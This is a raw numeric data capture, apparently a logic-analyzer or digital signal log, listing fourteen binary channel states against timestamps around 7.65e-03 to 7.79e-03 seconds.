0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6548920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6549120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6549400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6549640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6549880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6549960e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6550120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6550400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6550640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6550920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6551160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6551400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6551440e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6551640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6551880e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6552120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6552400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6552640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6552920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6553160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6553400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6553640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6553880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6553960e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6554120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6554400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6554640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6554920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6555160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6555400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6555640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6555880e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6556120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6556400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6556640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6556920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6557160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6557400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6557480e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6557640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6557880e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6557960e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6558120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6558400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6558440e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6558640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6558920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6559160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6559400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6559640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6559880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6560120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6560400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6560440e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6560640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6560920e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6560960e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6561160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6561400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6561440e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6561640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6561880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6561960e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6562120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6562400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6562640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6562920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6563160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6563400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6563640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6563880e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6563960e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6564120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6564400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6564440e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6564640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6564920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6565160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6565400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6565440e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6565640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6565880e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6566120e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6566400e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6566640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6566920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6567160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6567400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6567480e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6567640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6567880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6568120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6568400e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6568440e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6568640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6568920e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6568960e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6569160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6569400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6569640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6569880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6570120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6570400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6570640e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6570920e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,7.6571160e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,7.6571400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6571480e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6571640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6571880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6572120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6572400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6572640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6572920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6573160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6573400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6573640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6573880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6574120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6574400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6574640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6574920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6575160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6575400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6575640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6575880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6576120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6576400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6576640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6576920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6577160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6577400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6577640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6577880e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6578120e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6578400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6578640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6578920e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6579160e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6579400e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,7.6579640e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,7.6579880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,7.7826680e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,7.7828840e-03 1,1,0,1,0,0,0,0,0,0,0,1,0,1,7.7829120e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,7.7829400e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,7.7832200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,7.7832480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,7.7832720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,7.7833000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,7.7833240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,7.7833480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,7.7833720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,7.7834000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,7.7834200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,7.7834480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,1,7.7834720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7835000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7835240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7835480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7835720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7836000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7836200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7836480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7836720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7837000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7837240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7837480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7837720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7838000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7838200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7838480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7838720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7839000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7839240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7839480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7839720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7839960e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7840200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7840480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7840720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7841000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7841240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7841480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7841720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7841960e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7842200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7842480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7842720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7843000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7843240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7843480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7843720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7843960e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7844200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7844480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7844720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7845000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7845240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7845480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7845720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7845960e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7846040e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7846200e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7846480e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7846760e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7847000e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7847240e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7847480e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7847720e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7848000e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7848240e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7848520e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7848760e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7849000e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7849080e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7849240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7849480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7849720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7850000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7850240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7850520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7850760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7851000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7851240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7851480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7851720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7852000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7852240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7852520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7852760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7853000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7853240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7853480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7853720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7854000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7854240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7854520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7854760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7855000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7855240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7855480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7855720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7856000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7856240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7856520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7856760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7857000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7857240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7857480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7857720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7858000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7858240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7858480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7858760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7859000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7859240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7859480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7859720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7860000e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7860040e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7860240e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7860520e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7860760e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7861000e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7861240e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7861480e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7861720e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7862000e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7862240e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7862520e-03 1,1,0,1,0,1,0,0,0,1,0,0,1,0,7.7862760e-03 1,1,0,1,0,1,0,0,0,1,0,0,0,0,7.7863000e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7863080e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7863280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7863520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7863800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7864040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7864280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7864520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7864760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7865000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7865280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7865520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7865800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7866040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7866280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7866520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7866760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7867000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7867280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7867520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7867800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7868040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7868280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7868520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7868760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7869000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7869280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7869520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7869800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7870040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7870280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7870520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7870760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7871000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7871280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7871520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7871800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7872040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7872280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7872520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7872760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7873000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7873280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7873520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7873800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7874040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7874280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7874520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7874760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7875000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7875280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7875520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7875800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7876040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7876280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7876520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7876760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7877000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7877280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7877520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7877800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7878040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7878280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7878520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7878760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7879000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7879280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7879520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7879800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7880040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7880280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7880520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7880760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7881000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7881280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7881520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7881800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7882040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7882280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7882520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7882760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7883000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7883280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7883520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7883800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7884040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7884280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7884520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7884760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7885000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7885280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7885520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7885800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7886040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7886280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7886520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7886760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7887000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7887280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7887520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7887800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7888040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7888280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7888520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7888760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7889000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7889280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7889520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7889800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7890040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7890280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7890520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7890760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7891000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7891280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7891520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7891800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7892040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7892280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7892520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7892760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7893000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7893280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7893520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7893800e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7894040e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7894280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7894520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7894760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7895000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7895280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7895520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,7.7895800e-03 